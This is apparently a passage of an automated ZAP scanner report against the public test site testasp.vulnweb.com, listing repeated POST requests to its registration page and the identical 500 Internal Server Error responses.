<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D67 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:19 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
